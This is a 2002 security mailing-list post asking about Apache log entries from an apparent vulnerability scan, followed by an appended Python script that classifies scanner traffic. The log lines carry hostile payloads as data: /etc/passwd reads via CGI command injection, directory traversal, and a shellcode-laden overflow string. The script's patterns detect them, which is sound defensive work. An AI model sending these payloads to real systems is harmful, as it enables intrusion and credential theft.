From: Charles Funderburk (charles.t.funderburk_at_mail.sprint.com)
Date: Wed Jul 10 2002 - 13:04:28 CDT

    Hello all,

    I am new to the list and have gained a ton from reading all the comments and
    suggestions. I thought someone might be able to help me out and give me their
    two cents on something I noticed in my Apache access logs. Looks like a buffer
    overflow intended for an NT machine.

    0.70.24.222 - - [10/Jul/2002:01:05:44 -0500] "HEAD / HTTP/1.0" 200 0
    10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /IAmAScaryCyberCop.SNI" 404 -
    10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET http://10.144.192.54/cfdocs/expeval/openfile.cfm HTTP/1.0" 404 302
    10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
    10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
    10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%03%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\cybercop.htm" 404 -
    10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET http://10.144.192.54/cfdocs/expeval/displayopenedfile.cfm HTTP/1.0" 404 311
    10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
    10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
    10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cybercop.htm" 404 -
    10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET http://10.144.192.54/cfdocs/expeval/exprcalc.cfm HTTP/1.0" 404 302
    10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
    10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
    10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
    10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
    10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
    10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
    10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET //etc/passwd" 404 -
    10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd" 404 -
    10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.0" 404 292
    10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a" 404 -
    10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog" 404 -
    10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/info2www?(../../../../../../../../sbin/ping-c%d%s|)" 404 -
    10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/pfdispaly?../../../../../etc/passwd" 404 -
    10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd" 404 -
    10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "get /" 501 -
    10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/MachineInfo" 404 -
    10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /IAmAScaryCyberCop.SNI" 404 -
    10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=NAI+Test&dbq=..%2fwwwroot%2fNAI-18719.htm&newdb=CREATE_DB&attr= HTTP/1.0" 404 299
    10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /ASPSamp/ HTTP/1.0" 404 283
    10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/Count.cgi?dd=aa HTTP/1.0" 404 292
    10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /mylog.phtml?screen=/etc/passwd" 404 -
    10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET / HTTP/1.0" 200 1350
    10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "GET /mlog.phtml?screen=/etc/passwd" 404 -
    10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "GET /php/mylog.phtml?screen=/etc/passwd" 404 -
    10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "POST /cgi-win/uploader.exe/cgi-win/ HTTP/1.0" 404 304

    I haven't seen any of the code for the latest apache chunk exploit. Anyone
    have any ideas or suggestions?

    Thanks!

    -Charles

    -- 
    To unsubscribe, e-mail: suse-security-unsubscribe@suse.com
    For additional commands, e-mail: suse-security-help@suse.com
    Security-related bug reports go to security@suse.de, not here
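The burst in the log above is the kind of thing worth triaging mechanically rather than by eye. What follows is an added example of mine, not code from the original post or from the list: it parses Apache common-log lines (including entries whose request field has no protocol token and whose bytes field is "-", as several of the posted lines do), groups them by client address, and scores each client on request rate, 404 ratio and a set of indicator strings. The indicator strings (IAmAScaryCyberCop, cybercop.htm, NAI-nnnnn.htm, /etc/passwd, ../ and ..\ traversal, shell metacharacters in a CGI query string, the .exe CGI names) are lifted from the posted log; treating them as scanner fingerprints is my reading of the log, not something the post states. The embedded sample log is constructed from ten of the posted lines, re-joined onto one line per entry, plus two ordinary requests from a made-up second client (192.0.2.10) for contrast. The thresholds are arbitrary defaults.

```python
"""Triage of Apache access-log lines for web-scanner activity.

Added example, not part of the original post. Parses common-log-format lines,
groups them by client, and flags clients whose traffic looks like a
vulnerability scan: a burst of requests, a high 404 ratio, and requests that
match indicator strings seen in the posted log.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Apache common log format: host ident authuser [time] "request" status bytes.
# The request field may lack the protocol token ("GET /cybercop.htm") and the
# bytes field may be "-" when nothing was sent, as in the posted log.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Indicator patterns, matched against the URL-decoded request target. The
# strings come from the posted log; reading them as scanner fingerprints is an
# assumption of this example. Decoding first is what makes "%0a" and "%2f"
# visible as the newline and slash the server-side script would see.
SIGNATURES = [
    ("cybercop-marker", re.compile(r"IAmAScaryCyberCop|cybercop\.htm|NAI-\d+\.htm", re.I)),
    ("unix-file-read", re.compile(r"/etc/passwd")),
    ("traversal", re.compile(r"\.\./|\.\.\\")),
    ("shell-metachar-in-cgi", re.compile(r"/cgi-bin/[^?]+\?.*?[;|\n]", re.S)),
    ("windows-exe-cgi", re.compile(r"win-c-sample\.exe|newdsn\.exe|uploader\.exe", re.I)),
]

# Constructed sample: ten posted lines from the scanning host plus two ordinary
# requests from a made-up client (192.0.2.10, a documentation address).
SAMPLE_LOG = r"""
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /IAmAScaryCyberCop.SNI" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cybercop.htm" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET //etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.0" 404 292
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "get /" 501 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=NAI+Test&dbq=..%2fwwwroot%2fNAI-18719.htm&newdb=CREATE_DB&attr= HTTP/1.0" 404 299
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET / HTTP/1.0" 200 1350
192.0.2.10 - - [10/Jul/2002:01:07:00 -0500] "GET / HTTP/1.0" 200 1350
192.0.2.10 - - [10/Jul/2002:01:07:30 -0500] "GET /docs/ HTTP/1.0" 200 4210
"""


def parse_line(line):
    """Return a dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    parts = m.group("request").split(" ")
    return {
        "host": m.group("host"),
        "time": datetime.strptime(m.group("time"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": parts[0],
        "target": unquote(parts[1]) if len(parts) > 1 else "",  # decode once
        "proto": parts[2] if len(parts) > 2 else None,
        "status": int(m.group("status")),
    }


def classify(entry):
    """Names of the indicators one request triggers."""
    hits = [name for name, rx in SIGNATURES if rx.search(entry["target"])]
    # Apache answered "get /" with 501: a method token no browser sends.
    if entry["method"] != entry["method"].upper():
        hits.append("lowercase-method")
    return hits


def triage(log_text, burst_rate=10.0, not_found_ratio=0.5):
    """Per-client summary and verdict. Thresholds are arbitrary defaults."""
    per_host = defaultdict(list)
    for line in log_text.splitlines():
        entry = parse_line(line) if line.strip() else None
        if entry is not None:
            per_host[entry["host"]].append(entry)

    report = {}
    for host, entries in per_host.items():
        entries.sort(key=lambda e: e["time"])
        span = (entries[-1]["time"] - entries[0]["time"]).total_seconds()
        rate = len(entries) / max(span, 1.0)  # requests per second
        not_found = sum(1 for e in entries if e["status"] == 404)
        ratio = not_found / len(entries)
        signatures = sorted({h for e in entries for h in classify(e)})
        if signatures and (ratio >= not_found_ratio or rate >= burst_rate):
            verdict = "scanner"
        elif signatures or ratio >= not_found_ratio:
            verdict = "suspicious"
        else:
            verdict = "normal"
        report[host] = {"requests": len(entries), "span_seconds": span, "rate": rate,
                        "not_found": not_found, "signatures": signatures, "verdict": verdict}
    return report


if __name__ == "__main__":
    for host, s in triage(SAMPLE_LOG).items():
        print(host, s["verdict"], s["requests"], "requests,", s["not_found"], "x 404,",
              ", ".join(s["signatures"]) or "no indicators")
```

Two design points. The indicator match runs on the decoded target, otherwise the campas request (`%0acat%0a`) looks like a harmless query string; decode exactly once, since double-decoding would also "find" things the server never saw. And the verdict needs both a signature hit and a volume signal: a single 404 for /etc/passwd from a curious human is not a scan, while a hundred requests in one second with no indicator hits is more likely a broken crawler than an attacker.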